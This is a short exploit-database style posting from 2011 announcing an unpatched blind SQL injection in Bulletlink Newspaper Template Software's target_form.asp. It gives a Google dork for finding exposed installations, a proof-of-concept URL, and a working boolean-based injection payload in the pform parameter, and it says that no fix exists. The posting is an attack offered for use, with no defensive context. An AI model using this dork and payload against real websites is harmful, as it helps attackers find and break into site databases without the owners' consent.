Bulletlink Newspaper Template Software 0day Blind SQL Injection Vulnerability

2011-09-12 18:15:03

# Exploit Title: Bulletlink Newspaper Template Software
(target_form.asp) 0day Blind SQL-Injection
# Date: 09/11/2011
# Author: easypwn
# Vendor or Software Link: http://www.bulletlink.com
# Category: webapps
# Google dork: allinurl:target_form.asp?pform=
# Tested on: Windows 2000, Windows 2003, Windows 2008. (Microsoft SQL Server)


PoC: http://localhost/target_form.asp?pform={{DeleteMember}}'SQLi

Demo: http://localhost/target_form.asp?pform={{DeleteMember}}'%20AND%208589=8589%20AND%20'pRKy'='pRKy

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.